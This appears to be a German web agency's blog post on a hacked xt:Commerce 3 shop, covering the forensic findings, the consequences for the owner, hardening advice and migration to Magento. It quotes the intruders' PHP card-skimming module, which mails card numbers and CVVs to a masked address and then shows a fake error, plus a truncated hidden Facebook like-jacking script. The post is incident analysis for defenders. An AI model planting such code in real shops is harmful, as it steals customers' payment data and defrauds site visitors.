Einbruch in xt:Commerce 3? Gar kein Problem…

Der folgende Blogpost basiert auf einer wahren Begebenheit im Januar 2015, nur die Namen haben wir ge├Ąndert.

Vor ein paar Tagen, das Telefon klingelt. „Ja, hier Meier, Firma Meierland GmbH. Hier rufen Kunden an und erz├Ąhlen mir was von Phishing Mails mit Daten aus meinem Shop. Da stimmt was nicht, bitte checkt das mal.“

Herr Meier ist Inhaber eines prominenten Webshops und z├Ąhlt in seiner Branche zu den Top 3 Anbietern. Er vertreibt seine Produkte ├╝ber Amazon und seinen eigenen Webshop, der auf xt:Commerce 3 l├Ąuft. Trotz des alten technischen Unterbaus sind viele Produkte des Shops ├╝ber Google gut zu finden – nat├╝rlich auch ├╝ber AdWords. Der Shop verdient Geld.

Spuren finden

Schnell stellte sich im Rahmen einer Codepr├╝fung heraus, dass der Shop manipuliert wurde. Eine typische xt:Commerce 3 Installation besteht aus ca. 5.000 Dateien, etwa 200 davon sind in besonderem Ma├če f├╝r die Sicherheit relevant. Dort fanden sich dann auch verschl├╝sselte Codezeilen, die letztlich aufzeigten, was das Ziel der Kriminellen war.

Kreditkartendaten

Der Klassiker unter den Cyber-Raubz├╝gen ist das Abgreifen von Kreditkartendaten – und so auch in diesem Fall. ├ťber eine Schwachstelle im Shopsystem wurde das bestehende Kreditkarten-Zahlungsmodul um ein weiteres Modul erg├Ąnzt. Im Shop waren dadurch zwei Kartenzahlungsmodule verf├╝gbar – ein funktionierendes, ein manipuliertes. Das manipulierte Modul nahm die Kreditkartendaten an, versendete sie per Mail an den T├Ąter und verwies den Kunden dann mit einer Fehlermeldung darauf, dass er seine Kartendaten doch bitte noch einmal in dem anderen Kartenzahlmodul eingeben soll.

****
$message = „$firstname $lastname;$street;$city;$zip;$state;$country;$dayphone;$ccowner;$ccnumber;$ccexp;$cvv“;

if($ccnumber!=““){ mail(„**********@****.**“,“$servernya“, „$message“);
header(‚Location: https://‘.$_SERVER[‚SERVER_NAME‘].“/checkout_payment.php?error_message=Leider ist der $typ-Abrechnungserver temporar nicht verfugbar. Bitte nutzen Sie Kreditkarte mit 3-D-Secure-Prufung zur alternativen Direktzahlung. Wir bitten die Unannehmlichkeiten zu entschuldigen.“); exit;
}
****

Obwohl die Fehlermeldung weder h├╝bsch gemacht noch besonders elegant daherkam, konnte sie ganz offenbar Daten erbeuten, ohne das Kunden bereits w├Ąhrend des Bezahlvorgangs Verdacht sch├Âpften. Der Einbrecher hatte sein Ziel erreicht.

Facebook Likes

Die weitere Untersuchung des Codes brachte dann noch ans Licht, dass der Shop auch daf├╝r genutzt wurde, die Facebook-Seite eines Spielcasinos durch jede Menge „Like“-Klicks zu unterst├╝tzen. Obwohl ethisch verwerflich, war die technische Umsetzung doch durchaus interessant: ein paar wenige Zeilen Code gen├╝gten, um einem Kunden auf der Startseite des Shops eine unsichtbare Facebook-Likebox vorzusetzen. Wer dort auf ein Produkt klickte, l├Âste im Hintergrund den besagten Like aus, wurde aber auch direkt zum gew├╝nschten Produkt geleitet.

****
<script type=“text/javascript“>/*<![CDATA[*/(function(){var c=0,b=0,e=document.all?true:false;if(!e){document.capture
Events(Event.MOUSE
MOVE)}var d=document.create
Element(„iframe“);d.src=“
http://www.facebook.com/plugins/like.php?href=“+encodeURIComponent(„https://www.facebook.com/*****************“)+“&amp;layout=standard&amp;show_faces=true&amp;widt h=53&amp;action=like [….];return true}})();
</script>
****

Dass der Handel mit Facebook Likes kaum weniger kriminell ist als der Diebstahl von Kreditkartendaten, ist seit geraumer Zeit auch den Gerichten bekannt. Inwieweit Likes aus einem gehackten Webshop dem Nutznie├čer der Likes angelastet werden k├Ânnen, ist zwar noch nicht gerichtsfest dokumentiert – aus Sicht der Staatsanwaltschaft d├╝rfte es aber wohl nicht v├Âllig unm├Âglich sein, zumindest einen mittelbaren Zusammenhang herzustellen.

Konsequenzen

Wer Opfer eines solchen Cyber-Raubzugs wird, hat eine Menge Arbeit vor der Brust: der Einbruch muss aufgekl├Ąrt und die Schwachstellen behoben werden – ein ├Ąu├čerst undankbarer Job, bei dem man von der Polizei keine Hilfe erwarten darf. Das ist sehr bedauerlich, denn w├Ąhrend beim Wohnungseinbruch die Spurensicherung von der ├Âffentlichen Hand bezahlt wird, bleibt ein Shopbesitzer beim Aufkl├Ąren des virtuellen Tatorts auf den Kosten f├╝r forensische Ma├čnahmen sitzen. Dar├╝ber hinaus wollen diverse Stellen informiert werden, insbesondere empfiehlt sich eine Strafanzeige bei der Polizei. Auch der Landesdatenschutzbeauftragte und die Kunden freuen sich ├╝ber eine Information.

xt:Commerce 3 richtig h├Ąrten

Obwohl xt:Commerce 3 so etwas wie das Windows XP der Webshops ist, ist es immer noch weit verbreitet. Wer es im Einsatz hat, muss das Thema Sicherheit aktiv angehen. Es gibt Security Patches, Community Hacks und einen Sicherheitsleitfaden, mit dem die bisher bekannten Sicherheitsl├Âcher einigerma├čen ├Âkonomisch abgesichert werden k├Ânnen. Kommt dann noch ein Intrusion Detection System zum Einsatz, ein Codescanner und regelm├Ą├čige Online-Scans, kann auch ein xt:Commerce System noch relativ sicher betrieben werden. Falls Sie ein solches System betreiben und professionellen Support ben├Âtigen, nehmen Sie Kontakt mit uns auf.

Wer sich mit der H├Ąrtung eines Webshops besch├Ąftigt, muss sich nat├╝rlich auch ├╝ber Budgets f├╝r Sicherheit Gedanken machen. Die Kosten f├╝r die Absicherung m├╝ssen ins Verh├Ąltnis zum potenziellen Schaden gesetzt werden. Die Firma Meierland hat diese Rechnung auf die harte Tour pr├Ąsentiert bekommen: der Shop fiel eine ganze Weile aus, ein Team von Technikexperten musste einige Tage arbeiten, viel Lauferei zu Beh├Ârden, viel unangenehme Korrespondenz mit Kunden. Wer diesen Fall vor Augen hat, kann sich selber ├╝berlegen, wie viel Geld ihm Sicherheit wert ist. Zumindest noch – denn in absehbarer Zeit wird mit dem IT-Sicherheitsgesetz eine Gesetzes├Ąnderung in Deutschland kommen, die das Thema Haftung im Online-Business deutlich sch├Ąrfer fassen wird als bisher.

xt:Commerce migrieren

Mittelfristig f├╝hrt kein Weg daran vorbei, xt:Commerce durch eine modernere Shopplattform zu ersetzen. Die Entwickler von xt:Commerce 3 stellen schon seit geraumer Zeit keine Sicherheitsupdates mehr zur Verf├╝gung, der „Herstellersupport“ ist eingestellt. Spezialisierte Dienstleister – wie z.B. die tripuls – k├Ânnen xt:Commerce Installationen h├Ąrten und am Laufen halten. Leider werden Security-Ma├čnahmen von den Shopbetreibern viel zu selten proaktiv beauftragt.

In den allermeisten F├Ąllen ist der Umzug des eigenen Shopsystems auf eine neue Shopsoftware, z.B. auf das E-Commerc-System Magento, wirtschaftlich sinnvoll. Damit ein solcher Umzug gelingt, das Google-Ranking dabei nicht leidet und am Ende alles am richtigen Platz ist, stehen nat├╝rlich auch die zertifizierten Shopexperten von tripuls zur Seite.

Ausblick

Gelegentlich werden wir von Kunden beauftragt, deren selbstgehostete Server zu ├╝berpr├╝fen. Dabei stellen wir oft schon beim ersten Scan fest, dass bspw. Datenbanken nahezu ungesch├╝tzt direkt vom Internet aus erreichbar sind. Wenn solche Server dann noch nachl├Ąssig gewartet sind, gen├╝gen Krininellen wenige Mausklicks, um solche Server zu ├╝bernehmen.

Vor einem Jahr schrieben wir an dieser Stelle, dass xt:Commerce eines der gro├čen Hackziele werden w├╝rde. Dass wird sich auch dieses Jahr nicht ├Ąndern – im Gegenteil, es wird schlimmer. Seit den Snowden-Ver├Âffentlichungen ist das Bewusstsein f├╝r Sicherheitsl├╝cken bei Herstellern und Hackern auf ein deutlich h├Âheres Niveau gestiegen. Nahezu im Wochentakt werden Sicherheitsl├╝cken erkannt und behoben – doch diese Updates wollen auch getestet und installiert werden. Alle Shopbetreiber, egal ob sie xt:Commerce, Magento oder ein beliebiges anderes System nutzen, m├╝ssen sich mit einem proaktiven Sicherheitskonzept auseinandersetzen.

Die Meierland GmbH wird ├╝brigens ihren Shop nach dieser Erfahrung umstellen.

Einbruch in xt:Commerce 3? Gar kein Problem…
4.5 (90%) 2 votes

geschrieben von:

avatar

Kaufm├Ąnnischer GF, Prediger und Blogger

Noch keine Kommentare.

Hinterlasse eine Antwort

Nachricht